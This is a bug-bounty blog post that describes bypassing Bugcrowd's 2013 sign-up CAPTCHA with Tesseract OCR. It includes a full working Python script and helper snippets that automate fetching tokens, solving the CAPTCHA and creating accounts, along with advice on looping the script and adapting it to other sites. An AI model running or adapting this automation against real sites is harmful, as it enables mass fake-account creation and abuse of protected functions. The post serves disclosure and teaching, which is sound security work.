Bugcrowd Blog

Guest Blog: Breaking Bugcrowd's Captcha by Pwndizzle

Posted by Casey Ellis on Dec 4, 2013 10:08:42 PM

Introduction

A while back Bugcrowd started a bounty for the main Bugcrowd site. While flicking through the site looking for issues I noticed they were using a pretty basic CAPTCHA. In certain sections of the site, for example account sign-up, password reset and after multiple failed password attempts, you were required to enter the CAPTCHA to verify you were human.

[Screenshot: sign-up form with CAPTCHA]

This in theory would prevent automated use of these functions. But if I could find a way to bypass the CAPTCHA I could potentially abuse these functions.

So how do you bypass a captcha?

If it's a home-grown CAPTCHA you may be lucky enough to find a logic flaw such as the CAPTCHA code being included on the current page or perhaps you can re-use a valid CAPTCHA more than once.
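As a rough illustration of the first kind of flaw, the sketch below scans a page's form inputs for a value that matches the text you can read in the CAPTCHA image. The HTML snippet, the field names and the helper names are all made up for this example; none of them come from Bugcrowd or any real site.

```python
from html.parser import HTMLParser


class InputCollector(HTMLParser):
    """Collect name/value pairs from every <input> element on a page."""

    def __init__(self):
        super().__init__()
        self.inputs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            attributes = dict(attrs)
            name = attributes.get("name")
            if name:
                self.inputs[name] = attributes.get("value") or ""


def fields_leaking_answer(page_html, visible_answer):
    """Return the names of inputs whose value equals the CAPTCHA text."""
    collector = InputCollector()
    collector.feed(page_html)
    return [name for name, value in collector.inputs.items()
            if value.lower() == visible_answer.lower()]


# Hypothetical page: the answer is shipped to the browser in a hidden field.
SAMPLE_PAGE = """
<form action="/signup" method="post">
  <input type="hidden" name="captcha_answer" value="XK7QP">
  <input type="text" name="captcha">
  <input type="text" name="username" value="">
</form>
"""

leaks = fields_leaking_answer(SAMPLE_PAGE, "xk7qp")
print(leaks)
```

If a check like this ever returns a field name, there is no need for OCR at all: the script can simply copy the leaked value into the CAPTCHA field.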

If you're dealing with a more sophisticated CAPTCHA you've got two options. Either you outsource the work to a developing country (http://krebsonsecurity.com/2012/01/virtual-sweatshops-defeat-bot-or-not-tests/) or you can try optical character recognition (OCR).

OCR?

Assuming you don't choose to outsource the work, there are a few different OCR frameworks out there that you can use to automatically analyse an image and return a list of characters. I found Tesseract (https://code.google.com/p/tesseract-ocr/) to be a good choice as its engine has been pre-trained and it worked out of the box with decent results.

As the Bugcrowd CAPTCHA was so simple, all I needed to do was enlarge the image before submitting it to Tesseract, and the analysis succeeded most of the time. For other, more complex CAPTCHAs that use distorted characters or overlays to mask the text, you will need to clean the image before submitting it to Tesseract. Some examples can be found in the references below.
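To make the "enlarge and clean" idea concrete without tying it to a particular imaging library, here is a minimal pure-Python sketch that works on a grid of grayscale values (0 is black, 255 is white). The threshold of 128, the scale factor and the function names are assumptions for illustration. It uses nearest-neighbour scaling, which is not what my script does: the script further down resizes the real image with PIL's bicubic filter.

```python
def binarize(pixels, threshold=128):
    """Map every grayscale value to pure black (0) or pure white (255)."""
    return [[0 if value < threshold else 255 for value in row]
            for row in pixels]


def upscale(pixels, factor):
    """Enlarge a pixel grid by repeating each pixel (nearest neighbour)."""
    enlarged = []
    for row in pixels:
        wide_row = [value for value in row for _ in range(factor)]
        enlarged.extend(list(wide_row) for _ in range(factor))
    return enlarged


# A tiny 2x3 "image": dark text pixels mixed with lighter background noise.
noisy = [
    [30, 200, 90],
    [250, 110, 140],
]

clean = upscale(binarize(noisy), 2)
for row in clean:
    print(row)
```

Thresholding removes faint background noise, and enlarging gives the OCR engine more pixels per character to work with. Harder CAPTCHAs usually need more than this, such as removing lines or undoing distortion.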

Weaponizing using Python

With a way to obtain the CAPTCHA value, I decided to create a proof of concept script in Python that could automate account sign-up. Being the lazy security guy that I am, I had a look on Google to see if someone else had already created a similar script, and although there were CAPTCHA-breaking scripts I couldn't find an example of a full attack. So instead I wrote my own.

The Bugcrowd sign-up process consisted of two requests: one to retrieve the sign-up page (containing the CAPTCHA and CSRF tokens) and a second to send the sign-up data (username, email, password, etc.). To automate the whole process the script would need to download a copy of the sign-up page, extract the CSRF and CAPTCHA tokens, download and analyse the CAPTCHA, then submit a sign-up request containing the following:

[Screenshot: sign-up request parameters]
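The token extraction step can be tried offline first. The sketch below applies the same two regular expressions my script uses to a made-up stand-in for the sign-up page. The HTML layout and both token values are fabricated for the example, and extract_tokens is a hypothetical helper name.

```python
import re

# Made-up stand-in for the sign-up page; both token values are fabricated.
SAMPLE_HTML = (
    '<meta content="' + "Ab3+/" * 8 + 'xyz=" name="csrf-token" />\n'
    '<img src="/simple_captcha?code=' + "0a1b2c3d4e" * 4 + '" />\n'
)


def extract_tokens(page_html):
    """Return (csrf_token, captcha_token), with None for any that is missing."""
    # CSRF token: 43 base64 characters followed by "="
    csrf = re.search(r'[a-zA-Z0-9+/]{43}=', page_html)
    # CAPTCHA token: 40 lowercase letters or digits
    captcha = re.search(r'[a-z0-9]{40}', page_html)
    return (csrf.group(0) if csrf else None,
            captcha.group(0) if captcha else None)


csrf_token, captcha_token = extract_tokens(SAMPLE_HTML)
print("CSRF token:   ", csrf_token)
print("CAPTCHA token:", captcha_token)
```

Matching purely on length and character set is fragile: any other 40-character lowercase string that appears earlier in the page would be picked up instead, so it is worth checking the result against the real page source before relying on it.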

Using Python 3.3 I cobbled together the following:

# A script to bypass the Bugcrowd sign-up page captcha
# Created by @pwndizzle - http://pwndizzle.blogspot.com

import re
import subprocess
from urllib.error import URLError
from urllib.parse import urlencode
from urllib.request import Request, urlopen, urlretrieve

from PIL import Image


def getpage():
    global csrf, ctoken
    try:
        print("[+] Downloading Page")
        site = urlopen("https://portal.bugcrowd.com/user/sign_up")
        site_html = site.read().decode("utf-8")
        # Parse page for CSRF token (string 43 characters long ending with =)
        csrf = re.findall('[a-zA-Z0-9+/]{43}=', site_html)
        print("-----CSRF Token: " + csrf[0])
        # Parse page for captcha token (string 40 characters long)
        ctoken = re.findall('[a-z0-9]{40}', site_html)
        print("-----Captcha Token: " + ctoken[0])
    except URLError as e:
        print("*****Error: Cannot retrieve URL*****")


def getcaptcha():
    try:
        print("[+] Downloading Captcha")
        captchaurl = "https://portal.bugcrowd.com/simple_captcha?code=" + ctoken[0]
        urlretrieve(captchaurl, 'captcha1.png')
    except URLError as e:
        print("*****Error: Cannot retrieve URL*****")


def resizer():
    print("[+] Resizing...")
    im1 = Image.open("captcha1.png")
    width, height = im1.size
    # Enlarge the image five times in each dimension to help the OCR engine
    im2 = im1.resize((int(width * 5), int(height * 5)), Image.BICUBIC)
    im2.save("captcha2.png")


def tesseract():
    global cvalue
    try:
        print("[+] Running Tesseract...")
        # Run Tesseract; -psm 8 tells Tesseract we are looking for a single word
        # (Tesseract 4 and later spell this flag --psm)
        subprocess.call(['C:\\Program Files (x86)\\Tesseract-OCR\\tesseract.exe',
                         'C:\\Python33\\captcha2.png', 'output', '-psm', '8'])
        # Tesseract writes its result to output.txt in the current directory
        with open(r"C:\Python33\output.txt", "r") as f:
            # Remove whitespace and newlines from Tesseract output
            cvaluelines = f.read().replace(" ", "").split('\n')
        cvalue = cvaluelines[0]
        print("-----Captcha: " + cvalue)
    except Exception as e:
        print("Error: " + str(e))


def send():
    try:
        print("[+] Sending request...")
        user = "testuser99"
        params = {
            # urlencode() percent-encodes this check mark to %E2%9C%93
            'utf8': '\u2713',
            'authenticity_token': csrf[0],
            'user[username]': user,
            'user[email]': user + '@test.com',
            'user[password]': 'password123',
            'user[password_confirmation]': 'password123',
            'captcha': cvalue,
            'captcha_key': ctoken[0],
            'agree_terms_conditions': 'true',
        }
        data = urlencode(params).encode('utf-8')
        request = Request("https://portal.bugcrowd.com/user")
        # Send request and analyse response
        f = urlopen(request, data)
        response = f.read().decode('utf-8')
        # Check for error message
        fail = re.search('The following errors occurred', response)
        if fail:
            print("-----Account creation failed!")
        else:
            print("-----Account created!")
    except Exception as e:
        print("Error: " + str(e))


print("[+] Start!")
# Download page and parse data
getpage()
# Download captcha image
getcaptcha()
# Resize captcha image
resizer()
# Need more filtering? Add subroutines here!
# Use Tesseract to analyse captcha image
tesseract()
# Send request to site containing form data and captcha
send()
print("[+] Finished!")

 

Running the script from the c:\Python33 folder against a Bugcrowd signup page with the following CAPTCHA:

[Image: the CAPTCHA]

I get the following output:

[Screenshot: script output]

Awesome, so with one click the script can create an account. Add a for loop and make the username/email dynamic and we can sign up for as many accounts as we like, all automatically. So you're probably thinking, "If it's that easy to bypass a captcha, why isn't everyone doing it?" Well, there are some important points to remember:

- Tesseract doesn't analyse the captcha correctly every time. With Bugcrowd's simple captcha I was getting about a 30% success rate.

- Most sites don't use such a simple captcha and filtering noise can be tricky. A harder captcha means a lower success rate, more requests and a greater chance of getting caught or locked out.

- There could be server-side mitigations in place that we don't know about, e.g. a limit of five new accounts per IP address per day.

- The impact of a captcha bypass and mitigations can vary greatly depending on what the captcha is trying to protect.
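To put rough numbers on the for loop idea and the 30% success rate mentioned above, here is a small offline sketch. It assumes every attempt is independent and succeeds with the same probability, which is a simplification. The helper names, the username pattern and the placeholder token values are made up for the example, and nothing is sent over the network.

```python
import math
from urllib.parse import urlencode

OCR_SUCCESS_RATE = 0.30  # the rough per-attempt figure quoted above


def attempts_needed(confidence, success_rate=OCR_SUCCESS_RATE):
    """Smallest n where the chance of at least one success reaches confidence."""
    return math.ceil(math.log(1 - confidence) / math.log(1 - success_rate))


def signup_body(index, csrf_token, captcha_text, captcha_key):
    """Build the URL-encoded form body for the index-th throwaway account."""
    user = "testuser{:03d}".format(index)
    params = [
        ("authenticity_token", csrf_token),
        ("user[username]", user),
        ("user[email]", user + "@test.com"),
        ("user[password]", "password123"),
        ("user[password_confirmation]", "password123"),
        ("captcha", captcha_text),
        ("captcha_key", captcha_key),
        ("agree_terms_conditions", "true"),
    ]
    return urlencode(params)


print("Average attempts per account:", round(1 / OCR_SUCCESS_RATE, 1))
print("Attempts for a 95% chance of success:", attempts_needed(0.95))

# Placeholder tokens; a real run would fetch fresh ones for every attempt.
for i in range(1, 4):
    print(signup_body(i, "CSRF", "abcde", "KEY"))
```

Under those assumptions each account costs a little over three requests on average, and nine attempts are needed for a 95% chance of at least one success. That extra traffic is exactly what rate limits and lockouts are likely to notice.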

Final Thoughts

The Bugcrowd captcha is a great example of how not to implement a captcha and provided the perfect opportunity to demonstrate how easily weak captchas can be exploited with Python and Tesseract.

Captchas can be awesome if implemented correctly. Letter/number-based captchas are just too easy to break and can frustrate users. For me, image-based captchas (people, places, objects) or interactive captchas/mini-games like those offered by http://areyouahuman.com/ appear to be interesting alternatives with improved user experience and security.

If you want to use the script with a different site you'll need to change the URLs, the parsing logic and possibly apply image filters depending on the captcha. You may also need to analyse response data depending on the logic of the site. Depending on your system and where you run the script (I ran it from c:\Python33), file paths in the tesseract() function may need to be modified.
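One way to make the file paths less tied to my setup is to look for Tesseract on the PATH and build the working file names from a directory of your choice. This is only a sketch: find_tesseract and working_files are hypothetical helpers, and the fallback path is simply the Windows install location used in my script.

```python
import os
import shutil
import tempfile

# Fallback taken from the Windows install path used in the script above.
DEFAULT_TESSERACT = r"C:\Program Files (x86)\Tesseract-OCR\tesseract.exe"


def find_tesseract(default=DEFAULT_TESSERACT):
    """Prefer a tesseract binary found on PATH, else fall back to the default."""
    return shutil.which("tesseract") or default


def working_files(workdir):
    """Return paths for the raw image, the resized image and the OCR output."""
    return {
        "raw": os.path.join(workdir, "captcha1.png"),
        "resized": os.path.join(workdir, "captcha2.png"),
        # Tesseract appends ".txt" to the output base name itself.
        "output_base": os.path.join(workdir, "output"),
    }


paths = working_files(tempfile.gettempdir())
command = [find_tesseract(), paths["resized"], paths["output_base"], "-psm", "8"]
print(command)
```

The resulting list can be passed straight to subprocess.call(), and the OCR result is then read from the output base path plus ".txt". On Tesseract 4 and later the flag is spelled --psm.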

For more information about breaking captchas with Python I'd definitely recommend checking out the following posts:

http://blog.c22.cc/2010/10/12/python-ocr-or-how-to-break-captchas/

http://www.debasish.in/2012/01/bypass-captcha-using-python-and.html

http://bokobok.fr/bypassing-a-captcha-with-python/

Cleaning captchas with ImageMagick looked interesting but I didn't get round to testing it:

http://www.imagemagick.org

I hope you guys have found this post useful. For questions and feedback, head to Twitter or my blog.

Pwndizzle out.

 


Written by Casey Ellis

Founder and CEO of Bugcrowd